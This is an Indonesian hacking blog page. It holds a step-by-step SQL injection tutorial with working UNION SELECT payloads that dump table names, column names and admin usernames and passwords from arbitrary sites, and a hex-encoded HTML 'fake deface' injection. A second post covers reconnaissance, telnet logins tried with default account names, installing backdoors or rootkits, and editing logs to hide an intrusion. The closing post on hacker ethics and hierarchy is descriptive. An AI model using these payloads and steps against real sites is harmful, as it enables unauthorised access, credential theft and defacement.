RSS

nice info computer,hacking,business, viruss,n many more

Rave's Blog

Tampilkan postingan dengan label hacking. Tampilkan semua postingan
Tampilkan postingan dengan label hacking. Tampilkan semua postingan

Hacking With SQL Injection

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

Spoiler for Step 1: 
===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


  Spoiler for Step 2: 
==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--

Spoiler for Step 3: 
===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
Spoiler for Step 4: 
============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables--

seumpama table yang muncul adalah "admin"

Spoiler for Step 5: 
===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

Spoiler for Step 6: 
=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--
Spoiler for Step 7: 
============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--
Spoiler for Step 8: 
==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari gan 1 .

DEFACE PALSU VIA SQL INJECTION

langsung aja yahh..
deface palsu via sql injection?
maksudnya?
buat yg master,jgn d baca yahhh...
cm niat utk share kok...hhe ..

pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS..
gmn crnya ?
lnjut ..

1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh.
2.
nah misal ud dpt target nihh..
Code:
http://www.target.com/news.php?id=-70 union select 1,2,3,4,5,6,7,8,9--
3.
cek versinya...
Code:
http://www.target.com/news.php?id=-70 union select 1,2,@@version,4,5,6,7,8,9--
4.
drpd cape ngeblind..
yaudah buat gaya2an..deface palsu ajaa..
kalian tw kan yg ngerubah ascii jd hex code?
kl bingung,
buka ini
http://dieq41.com/tools/text.html
nah coba buat script deface,misal
Code:
<h1>hacked by me</h1>
masukin ke bagian ASCII yg ada d web dieq41..

trus kl ud d masukin..
liat bagian hexadecimal,bakal muncul:
Code:
3C68313E6861636B6564206279206D653C2F68313E

nah kode d atas tuh kodehasil convert dr ascii ke hex..

nah,,skrg yg kode 3C68313E6861636B6564206279206D653C2F68313E ditambah 0x d depannya ...jadi

Code:
0x3C68313E6861636B6564206279206D653C2F68313E

oke,coba masukin d angka 3 ,yg script hex nyaa..


Code:
http://www.target.com/news.php?id=-70[/url] union select 1,2,0x3C68313E6861636B6564206279206D653C2F68313E,4 ,5,6,7,8,9--

jika ada bacaan : hacked by me?

.itu tandanya udah berhasil sob..
sumber : lovemutia n Rave
















































































































READ MORE - Hacking With SQL Injection

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Mengeksploitasi Sistem

/*=-1.1 Definisi Hacker*=-

Hacker. Sebuah istilah yang mirip dengan cracker, yang akan dijelaskan pada bagian berikutnya. Hacker adalah profesional komputer. Mereka menghabiskan sebagian besar waktunya, mendedikasikan keahlian komputer dan segala sesuatu yang berhubungan dengan dunia TI. Orang-orang ini merupakan pakar internet, memahami dunia komputasi. Administrator jaringan anda, menganggap mereka memahami benar apa yang mereka bicarakan, kebanyakan juga seorang hacker. Hacker bukanlah orang-orang yang ada dibarisan terdepan dalam perang internet guna memperoleh akses ilegal ke komputer tanpa alasan yang kuat. Seorang hacker hanya akan mengambil alih sistem jika hal tersebut membutuhkan proses pemikiran yang rumit, sesuatu yang menantang, dan yang akan memberikan informasi atau membantu mereka mengklarifikasi informasi tentang bagaimana hal tersebut dilakukan. Para hacker selalu haus ilmu pengetahuan, mempelajari lebih dalam, menyukai dan selalu ingin memperoleh lebih rinci mengenai subyek tertentu. Komputer. Internet. Catatan: Para hacker dapat juga didefinisikan sebagai kelompok White Hat

/*-=1.2 Definisi Cracker*=-

Cracker. Merupakan sisi gelap dari profesional keamanan komputer yang menyimpang terlalu jauh. Kaum Script Kiddies, kaum Black Hat, orang-orang yang tanpa pengetahuan kecuali cara melakukan hacking. Kelompok ini tidak mengetahui bagaimana komputer tersebut bekerja. Seorang cracker tidak peduli terhadap masyarakat dan tidak memikirkan akibat dari tindakan mereka. Para Cracker dianggap hina dalam forum hacking dan identik dengan kerusakan dan "Google". Para cracker ingin segala sesuatunya yang dikuasainya disimpan dalam piringan hitam. Mereka tidak mencari informasi untuk diri mereka dan tergantung siapa saja yang memberikannya ke mereka. Mereka inilah kaum wanna-be. Anda tidak ingin menjadi salah satu dari mereka bukan?

/*=-1.3 Definisi Greyhat *-=\

Greyhat. Sebuah istilah yang mendefinisikan gabungan dari cracker dan hacker. Para Greyhat adalah sekelompok orang yang memiliki kecenderungan mempelajari segala sesuatu tentang komputer. Sering ada di berbagai forum diskusi dan mengajukan pertanyaan, dan melihat jawaban pertanyaan mereka, atau menanyakan tentang sesuatu tanpa mencarinya dengan google. Para Greyhat sering melakukan pembobolan sistem dan mengacaukan keadaan. Bagaimanapun, seorang greyhat membiarkan administrator mengetahui bagaimana mereka berhasil menyusup ke dalam sistemnya. Mereka cenderung melakukan sesuatu yang ilegal, namun hanya untuk memuaskan keingintahuan dan melihat apa yang terjadi. Para Greyhat senang menulis exploit dan membaginya dengan orang lain.

/*-=2.0 Riset=-*\

Bagian dari dokumen ini menunjukkan kepada anda bagaimana cara melakukan riset mengenai target anda. Anda perlu mengetahui sebanyak mungkin mengenai komputer tersebut demi kesuksesan hacking anda. Saya berbicara mengenai bagaimana menghabiskan waktu anda untuk mempelajari tentang komputer, mengetahui apa yang dilakukan komputer tersebut, mendapatkan gambaran siapa yang menggunakannya, dsb. Anda perlu mengetahui secara tepat apa tentang komputer ini dan mencari kemungkinan untuk mengeksploitasi sistemnya. Jika anda tidak atau kurang melakukan riset ini, anda akan mentok dan tersesat, ujung-ujungnya masuk penjara. Untuk riset yang baik, untuk hal-hal yang tidak anda pahami, gunakan google.

/*=-2.1 InterNIC-=*

InterNIC memiliki suatu database dari setiap website yang terdaftar domainnya. Anggaplah anda membeli sebuah domain .com, maka InterNIC akan menambahkan domain anda dalam databasenya secara otomatis. Domain .com terdistribusi melalui InterNIC. Cukup rumit untuk menjelaskan hal ini, tapi sekedar tahu saja, InterNIC dapat memberitahukan anda banyak hal mengenai pemilik domain terdaftar ini. Jadi misalkan anda ingin melakukan hack situs foobar.com, yang merupakan situs porno. Pergilah ke www.internic.net dan lakukan pencarian pada WHOIS untuk mencari domain foobar.com. Begitu selesai hasilnya akan menampilkan apa yang dikerjakan, nameserver, pemilik domain, kapan domain tersebut dibuat, kapan kadaluarsanya, dan terakhir kali diupdate. Sebagaimana yang anda lihat, beberapa informasi ini mungkin tidak ditampilkan, tapi sangat baik untuk mengetahui segala kemungkinannya.

/*=-2.2 Whois.sc-=*\

Lebih dari itu ada www.whois.sc, website ini whois engine yang lain. Saya menemukan website ini tergolong ekstrim saat mengumpulkan informasi mengenai suatu komputer. Cobalah anda ketik foobar.com dan lihat hasilnya. Anda akan ditunjukkan gambar dan judul website. Oh, apa ini? komputer tersebut juga menjalankan sugoisugoi.com pada webservernya... yang memberitahukan sistem operasi apa yang dijalankannya. Misalkan webserver foobar.com menjalankan Microsoft-IIS/5.0. Termasuk IP address, lokasi komputer tersebut, monitoring domain, dimana domain tersebut terdaftar. Juga memberitahukan apakah mereka memiliki domain lain seperti .net, .org dsb.

/*-=2.3 Aplikasi Command Line=-*\

Ada beberapa aplikasi baris perintah (command line) yang harus digunakan untuk mencari informasi spesifikasi komputer. Untuk dapat berbicara dengan komputer tersebut ketik 'ping <domain atau ip>. Anda akan memperoleh informasi mengenai packet loss dan sebagainya. Jika dikatakan Loss 0% maka segalah sesuatunya berjalan dengan sempurna. Anda juga dapat menggunakan perintah 'tracert', program yang melacak IP address. Sebuah aplikasi yang akan kita dapatkan berikutnya adalah 'telnet' yang cukup bermanfaat.

------------------------------------------------------------------------------

/*=-2.4 Port Scanning-=*\

Berlawanan dengan sebelumnya, Port Scanning merupakan hal yang legal di Amerika Serikat. Disana, Port Scanning bukan hal yang ilegal terkecuali jika mengganggu administrator yang sistemnya anda port scan. Anda tidak akan "ditangkap" karena port scanning, sebagaimana anda tidak ingin dipenjara. Namun, anda bisa ditangkap. Saat anda melakukan port scan komputer orang lain, maka firewall komputer tersebut akan melog IP address anda. Beberapa sistem firewall, seperti Norton Internet Security bahkan lebih jauh memberitahukan terjadinya scan, dan melakukan tracert, nslookup, whois, dsb. Intinya, segala yang anda lakukan akan direkam dan menyajikannya ke administrator beberapa saat setelah port scan. Melakukan port scan berulang-ulang dari satu komputer akan mengakibatkan anda di "banned" dari jaringan mereka dan mendapatkan kesulitan dari Internet Service Provider anda. Rekomendasi saya, port scan sesekali dan selesai. Sekarang, anda mungkin bertanya, apakah sebenarnya port scanning itu? Well, pada dasarnya, hal itu berupa scan IP address target dan mengumpulkan informasi mengenai service yang sedang dijalankan. Service merupakan istilah mengenai aplikasi apa yang sedang dijalankan yang memberikan traffic antara komputer tersebut dengan "gerbang" internet, yang dikenal dengan port.

----====[2.41 Tool untuk Port Scanning

Untuk melakukan scan port komputer target, anda memerlukan suatu aplikasi. Ada beberapa port scanner populer di Internet, diantaranya:

·   -Nmap (Ini yang terbaik)
·   -Blues port scanner (Sangat populer)
·   -Knocker (Aplikasi yang bagus - Open source)

Saya merekomendasikan agar anda mempelajari cara menggunakan tool ini, Blues Port Scanner tidak terlalu sulit, tapi anda harus belajar sedikit bagaimana cara mengunakan Nmap sebelum melanjutkan tutorial ini.


----====[2.42 Scanning

Baiklah, sekarang saatnya scan foobar.com. Kita telah memiliki IP address-nya melalui whois engine jadi kita dapat melakukan scan. Begitu kita masukkan IP address dalam port scanner, untuk melakukan scan setiap port yang menggunakan protokol TCP. Output yang kita dapatkan berupa:

TCP: xxx.xxx.xxx.xxx [21-ftp]
TCP: xxx.xxx.xxx.xxx [23-Telnet]
TCP: xxx.xxx.xxx.xxx [25-SMTP]
TCP: xxx.xxx.xxx.xxx [80-HTTP]

Berikutnya! dari hasil scan ini, kita dapat memastikan bahwa foobar.com menjalankan webserver pada port 80, Outgoing Mail Server pada port 25, Telnet Server pada port 23, dan ftp server pada port 21. Lakukan riset lebih lanjut. Sebelum bergerak lebih dalam, misalkan menggunakan suatu vulnerability scanner untuk membuat beberapa bagian lebih mudah. Tapi tutorial ini tidak akan menjelaskan panduan menggunakan vulnerability scanner. Akan dibahas pada artikel tersendiri.

/*-=2.5 Penjelajahan Port=-*

Begitu kita memiliki daftar port yang ada dalam komputer target, maka kita tetapkan sasarannya pada telnet server mereka.

-----===[2.51 Telnet

>telnet
telnet>open
(to) xxx.xxx.xxx.xxx:23
Welcome to foobar...
login:_

Kita telah berada pada login prompt. Sekarang apa? hmm, anda pertama kali harus mencoba beberapa login *NIX biasa, dengan kata lain mencoba beberapa password window yang umum. Anda dapat mencari daftar password umum melalui google. Untuk referensi-nya adalah sebagai berikut:

root bin adm
makefsys sysadm sys
mountfsys rje sync
umountfsys tty nobody
checkfsys somebody setup
lp powerdown ingres
dptp general guest
daemon gsa user
trouble games help
nuucp public unix
uucp test admin
student standard pub
field demo batch
visitor listen network
uuhelp usenet sysinfo
cron console sysbin
who root2 startup
shutdown ncrm new

hehehe, biasanya sih tidak akan bekerja. Jadi mengapa tidak mencoba login secara anonymous. Catatan: Kebanyakan server tidak mengijinkan adanya anonymous login.

-------=======[2.511 Menyusup!

Jika anda memperoleh root access maka ... yah... terserah anda ingin melakukan apapun yang ingin anda lakukan. Sebagai gambaran, inilah yang akan dilakukan oleh:

·   Hacker: Memberitahukan administrator bahwa anda berhasil menyusup dan memberitahukan cara memperbaiki kelemahan sistem ini:
·   Cracker: Menginstall suatu rootkit agar semakin mudah mengaksesnya nanti, atau trojanisasi pada komputer ini. Atau menghapusnya secara keseluruhan.
·   Greyhat: Menginstall backdoor. Dan membiarkan administrator mengetahui bahwa anda berhasil menyusup.

-Komentar oleh g0dzuki-
Jangan pernah menghapus log... anda akan ketahuan -- edit saja trace anda, jika anda tidak ingin melepas flag yang memberitahukan keberadaan anda.

-EOC-

Anggaplah anda tidak memiliki root access, tapi anda berhasil login ke sistem tersebut. Cobalah beberapa perintah berikut ini, untuk menjelajah. Mencoba menemukan sesuatu yang bisa menolong anda agar mendapatkan akses penuh ke komputer tersebut. Berusaha mengeksekusi program komputer tersebut. Anda mungkin dapat mendownload sesuatu menggunakan text browser dan mengeksekusinya. Banyak skenario yang bisa dilakukan untuk hal ini.

Nah, jika anda mentok, gunakan google, carilah jawaban atas pertanyaan anda sendiri. Ingat, jika mengalami mentok, hapuslah log anda.

-------=======[2.512 Access Denied.

OK, masih banyak pilihan untuk anda jelajahi. Silakan lanjutkan ke bagian berikutnya. Yaitu melalui:

---===[2.52 FTP

Masih ingat FTP server yang dijalankan oleh komputer tersebut? mari kita coba dan melihat apakah kita dapat mengumpulkan beberapa informasi dari situ. Melalui command prompt dan ketiklah:

>ftp
ftp> open
to: foobar.com:21
Welcome to Serv-U FTP v4.2
Guests log in as guest/email
login: guest
passwd: bla@bla.com
Your email and Ip addres have been recorded.
> dir
files myprogs programs
>cd myprogs
>dir
. ..
> cd ..

Anda akan melihat dalam contoh tersebut bahwa ftp anonymous dalam keadaan enabled. Mereka juga memberikan nomor versi ftp server-nya! Hal ini banyak membantu.

---===[2.52 HTTP

Baiklah, sekarang periksa bahwa webserver yang foobar.com jalankan. Lihat apakah kita dapat menemukan jenis server yang sedang dijalankan. Cobalah menggunakan web browser anda dan kunjungi:

http://foobar.com/some-page-that-aint-there.html, jika anda beruntung, anda akan mendapatkan sebuah pesan yang muncul saat webserver tidak dapat menemukan halaman web. Halaman web ini berisikan informasi mengenai webserver seperti nama, version number, dan alamat email administrator. Jika hal ini tidak bekerja, maka masih ada cara lain untuk memanggil informasi ini. Misalnya website tersebut memiliki struktur direktori seperti:

www.foobar.com
www.foobar.com/images/
www.foobar.com/lessons/1/
www.foobar.com/garbage/
www.foobar.com/garbage/trash/1.html
www.foobar.com/garbage/trash/2.html

Yep, seperti itulah. Direktori yang tidak pernah diakses oleh orang-orang pada suatu situs? Hal ini bisa jadi sangat berharga dalam memperoleh informasi yang anda inginkan. Mengenai webserver dengan cepat. Suatu webserver, saat mengetik www.foobar.com akan mencari file index.html. Jika file ini tidak ditemukan, maka akan memberikan anda daftar seluruh direktori dan file dalam suatu struktur file. Sebagai contoh akan menjadi seperti ini: http://www.w00w00.org/files/ (yang juga bekerja, taruh hal ini pada browser anda sebagai contoh). Lihat abgaimana file dan folder-nya terdaftar? Perhatikan bahwa tidak ada index.html disana. Juga, perhatikan bagian paling bawah halaman tersebut. Anda akan melihat tulisan Apache/1.3.27 Server at www.w00w00.org Port 80. Inilah informasi yang kita cari.

------------------------------------------------------------------------------

/*=-3.0 Exploitasi-=*\

Eksploitasi dapat juga didefinisikan sebagai, dalam beberapa hal, mengambil keuntungan dari celah keamanan dalam sistem dalam pencarian atau penghargaan dari beberapa tujuan. Seluruh eksploitasi celah keamanan merupakan serangan namun tidak seluruh serangan dapat mengeksploitasi celah keamanan. Seorang cracker dapat menggunakan suatu exploit untuk memperoleh akses ke suatu sistem komputer.

---===[3.1 Mencari Exploit

Begitu, kita mengetahui nomor versi dan software yang foobar jalankan. Sekarang, kita perlu mencari apakah ada cara untuk mengeksploitasi aplikasi ini dan service-nya? Kita dapat menggunakan suatu software untuk mengambil keuntungandari service ini dan memperoleh akses ke komputer ini. Ada banyak cara menemukan suatu exploit. Yang paling mudah, melalui BugTraq. Hal terbesar mengenai BuqTraq adalah banyaknya bug software yang diposting disini, seorang user biasanya memposting suatu exploit untuk waktu yang lama.
Google.com menyatakan banyak BuqTraq yang berbeda. Berikut ini dua situs yang memiliki range terbesar aplikasi.


Anda juga dapat menggunakan google untuk mencari daftar situs yang memberikan exploit, sebagian ada beberapa yang terus mengupdate database exploitnya. Dengan menggunakan website ini, coba dan cari suatu exploit untuk versi software yang target tersebut jalankan. Dalam kasus ini adalah foobar.com, yang menjalankan Serv-U v4.2. Carilah pada www.securityfocus.com, ada beberapa hal yang berbeda mengenai celah keamanan yang dapat dicoba. Diantaranya bahkan memberikan exploit dalam bentuk script perl yang sederhana dijalankan yang merupakan exploit buffer overflow.

Dalam kasus ini, webserver apache foobar menjalankan:
Pada securityfocus.com disebutkan mengenai error log escape sequence injection vulnerability. Maksudnya, bahwa dengan menggunakan malicious escape sequence dalam sebuah terminal emulator, yang memungkinkan seseorang mengeksekusi program dan berbagai perintah pada komputer target.

---===[3.3 Menulis Program Sendiri

Bila tidak ada exploit untuk aplikasi yang target tersebut jalankan, maka solusi logisnya adalah melakukan riset tentang bagaimana aplikasi tersebut bekerja, dan memperluas pengetahuan anda untuk menuliskan exploit sendiri. Biasanya membutuhkan pengetahuan luas mengenai bahasa pemrograman tertentu. Inilah yang membedakan anda dari seorang script kiddie, menuliskan program exploit anda sendiri merupakan kehormatan besar. Dengan menulis exploit sendiri merupakan tahapan awal menjadi seorang profesional komputer.

------------------------------------------------------------------------------

/*-=4.0 Kesimpulan=-*\

Setelah cukup mengumpulkan informasi untuk eksperimen. Nasehat saya adalah. Jika anda benar-benar serius di bidang komputer dan ingin mengetahui seluruh aspeknya, anda perlu melangkah lebih jauh dari ini. Pergilah ke penjual komputer 'second' terdekat di kota anda, tanyalah apakah mereka memiliki komputer yang dijual murah. (Saya tidak membicarakan komputer USA Branded, best buy atau Perusahaan Besar). Saya membicarakan tentang membangun suatu perusahaan "Anda, Co". Membeli komputer murah dari mereka. Jangan lebih dari $200. Buatlah Lab sendiri. Hubungkan dua buah komputer. Berbagi koneksi internet. Mempelajari bagaimana mengeset firewall. Mungkin menaruh *NIX pada salah satunya dan pelajari bagaimana operasionalnya. Simulasikan hacking anda sendiri. Mungkin menaruh suatu aplikasi pada satu komputer dan mencoba melakukan hacking komputer tersebut melalui komputer satunya. Cari ini sangat LEGAL an menyenangkan dalam mempelajari keamanan komputer. Lebih dari yang bisa anda dapatkan dari text book. Mungkin anda dan teman anda membentuk kelompok kecil untuk bermain perang hacking (hanya saja jangan melakukan hal-hal yang berbahaya pada komputer mereka!). Lihat siapa yang berhasil menghack root pertama kali. Ingatlah, pengetahuan yang luas diperoleh dengan membandingkan kemampuan anda dengan yang lainnya.

Selamat bersenang-senang!


sumber:

_Spyderpop_



READ MORE - Mengeksploitasi Sistem

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hacker or Cracker


   Hacking 
Hacking adalah pekerjaan yang dilakukan secara cepat dan berhasil, walau tidak sempurna. Suatu hal Mustahil, dan mungkin menghabiskan banyak waktu tetapi
menghasilkan yang diinginkan untuk membuktikan baik secara emosional ataupun fisik bahwa ini bisa dilakukan. Kegiatan hacking dilakukkan secara bersungguh-sungguh, dengan ketelitian yang tinggi dalam berinteraksi dengan komputer dalam bermain dan bereksplorasi
Hacker adalah Seseorang yang sangat senang mengeksplorasi suatu program dari suatu system untuk untuk mengetahui batas kemampuannya, dengan mengunakan cara-cara dasar yang akan digunakan oleh orang yang tidak mengerti dan mengetahui bagaimana program itu dibuat dan dengan pengetahuan minimum
terhadap program.  Hacker adalah seorang yang sangat antusias dalam membuat program, dan lebih menikmati membuat program dibandingkan berteori tentang program

Kemampuan atau Skill dari Hacker serta gaya hidup Hacker :
  • Ahli pemrograman, baik itu bahasa C,java,ajax,assembly,PHP,maupun C# yang jelas mengusai lebih dari 2 bahasa pemrograman.
  • Secara sembunyi-sembunyi berusaha menemukan informasi penting dengan cara menjelajah, lebih sering di sebut sebagai cracker.
  • Melakukan Hacking  maupun Carding dengan tujauan pribadi
  • Senang dengan tantangan intelektual dengan ide kreatif rata-rata mempunyai logika yg tinggi
  • Telah melewati tahap newbie atau  tahap dasar hacker.
  • Bisa atau menguasai minimal 3 Sistem operasi,Windows,Linux,dan Free Bsd
Cracking

Cracking adalah kegiatan.memaksa masuk kedalam suatu sistem, menghilangkan copy protection,
atau merusak suatu aplikasi dengan berbasis keygen atau Serial number.
orang yang melakukan kegiatan Cracking ini disebut Cracker.Biasa nya cracker melakukan aksi nya 
dalam bentuk kejahatan.Misalnya mendeface suatu website sehingga web tersebut tidak bisa di akses
serta merusak sistem database web atau  suatu forum,dengan tujuan atau motivasi tertentu.

Etika & Aturan main Hacker


  • Di atas segalanya, hormati pengetahuan & kebebasan informasi.
  • Memberitahukan sistem administrator akan adanya pelanggaran keamanan/lubang di keamanan yang anda lihat.
  • Jangan mengambil keuntungan yang tidak fair dari hack.
  • Tidak mendistribusikan & mengumpulkan software bajakan.
  • Tidak pernah mengambil resiko yang bodoh selalu mengetahui kemampuan sendiri.
  • Selalu bersedia untuk secara terbuka/bebas/gratis memberitahukan& mengajarkan berbagai informasi & metoda yang diperoleh.
  • Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
  • Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
  • Tidak pernah secara sengaja menghapus & merusak file di komputer yangdihack.
  • Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Hirarki Hacker

Mungkin agak terlalu kasar jika di sebut hirarki / tingkatan hacker; istilah ini tidak sepenuhnya bisa di terima oleh masyarakat hacker.  Secara umum yang paling tinggi (suhu) hacker sering di sebut ‘Elite’; di Indonesia mungkin lebih sering di sebut ‘suhu’.Sedangkan, di ujung lain derajat hackerdikenal ‘wanna-be’ hacker atau dikenal sebagai ‘Lamers’.

Elite

Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistemoperasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global.
Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.

Semi Elite

Hacker ini biasanya lebih muda daripada Elite.Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.

Developed Kiddie

Sebutan ini terutama karena umur kelompok ini masih muda (ABG)&masih sekolah.  Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya.Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

Script Kiddie

Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

Lamer

Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi hacker (wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Tips Menjadi Hacker

Untuk menjadi Hacker, yang diperlukan pertama sekali adalah keinginan. Karena yang jadi pertanyaan bukanlah ‘Apakah saya akan menjadi seorang Hacker ?’, tetapi ‘Apakah saya ingin menjadi seorang Hacker ?’. Jika anda telah memiliki keinginan, maka anda telah memiliki sebuah modal dasar sebagai pijakan anda anda dalam melangkah.
Segala sesuatu pasti dimulai dari impian, dan sudah pasti jika anda memiliki impian, anda akan mencoba untuk merealisasikannya. Intinya, sebelum melangkah yakinkan kalau anda telah miliki keinginan.

Pelajari bahasa pemprograman

Hal pertama yang harus anda pelajari adalah bahasa pemprograman. Saat ini di dalam distribusi sistem operasi Linux, terdapat beragam tool-tool berguna yang akan menunjang anda untuk belajar memprogram. Untuk mendapatkan Linux saat ini sudah sangat mudah, anda bisa membelinya secara online (www.gudanglinux.or.id), mendapatkan Copy-an CD nya dari teman. Atau jika anda mempunyai akses internet yang baik, anda bisa langsung mendownload distribusi linux situs resmi-nya, atau melalui www.linuxiso.com. Menurut Eric S. Raymond, bahasa pemprograman yang baik untuk anda pelajari pertama sekali adalah ‘Python’. “Desain-nya bersih, terdokumentasi dengan baik dan cukup mudah bagi pemula”

Pelajari dan kembangkan salah satu Unix OpenSource.

Mengapa Linux/Unix OpenSource begitu penting ? Ini semua tidak lepas dari semangat OpenSource itu sediri. Dengan mempelajari kode-kode yang dirilis bebas dalam sistem operasi OpenSource, kita dapat mempelajari pola pikir seorang programmer/Hacker, kita dapat menemukan cara mereka dalam meyelesaikan masalah dan mencoba mencari metoda penyelesaian masalah yang lebih baik dari apa yang mereka lakukan. OpenSource juga membantu kita dalam membangun sebuah aplikasi, sehingga kita tidak perlu direpotkan dengan ‘research’. Mereka telah melakukan-nya untuk kita, dan kita bisa memanfaatkan waktu yang tersisa untuk hal yang lebih spesifik.
“Saya bisa berpandangan jauh, karena saya berdiri di pundak orang-orang jenius terdahulu .. ” [Sir Isaac Newton]

Pelajari hal-hal baru

